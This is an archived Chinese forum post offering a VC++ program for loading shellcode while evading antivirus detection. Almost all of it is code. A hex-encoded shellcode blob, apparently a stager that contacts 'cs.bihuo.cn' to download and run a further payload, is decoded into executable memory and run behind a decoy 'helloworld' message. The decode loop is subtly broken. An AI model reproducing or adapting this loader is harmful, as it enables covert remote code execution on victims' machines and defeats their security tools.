vc++加载本地shellcode实现免杀-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2020-3-15 23:00:11

vc++加载本地shellcode实现免杀

#include <string.h>
#include <windows.h>
#include <stdio.h>
#include <iostream>

#pragma warning(disable:4996)
void main()
{
        LPSTR bihuo_output = (LPSTR)"fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d686e6574006877696e6954684c772607ffd531ff5757575757683a5679a7ffd5e9840000005b31c951516a035151686f00000053506857899fc6ffd5eb705b31d252680002608452525253525068eb552e3bffd589c683c35031ff57576aff5356682d06187bffd585c00f84c301000031ff85f6740489f9eb0968aac5e25dffd589c16845215e31ffd531ff576a0751565068b757e00bffd5bf002f000039c774b731ffe991010000e9c9010000e88bffffff2f664b515a0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616900557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e5420362e303b20574f5736343b2054726964656e742f352e30290d0a0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f0068f0b5a256ffd56a4068001000006800004000576858a453e5ffd593b90000000001d9515389e7576800200000535668129689e2ffd585c074c68b0701c385c075e558c3e8a9fdffff63732e626968756f2e636e0000000000";
        //编写bihuo_str 开始
        const char* bihuo_str = bihuo_output;
        int bihuo_length = strlen(bihuo_str);
        unsigned char* value = (unsigned char*)calloc(bihuo_length / 2, sizeof(unsigned char));
        for (size_t count = 0; count < bihuo_length / 2; count++)
        {
                sscanf(bihuo_str, "%2hhx", &value);
                bihuo_str += 2;
        }
        void *exec = VirtualAlloc(0, bihuo_length/2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, value, bihuo_length/2);

        //printf("%s", exec);
        printf("helloworld\n必火网络安全带你走进免杀世界\n");
        ((void(*)())exec)();
       
        //system("pause");
        //cin >> name;
}
页: [1]
查看完整版本: vc++加载本地shellcode实现免杀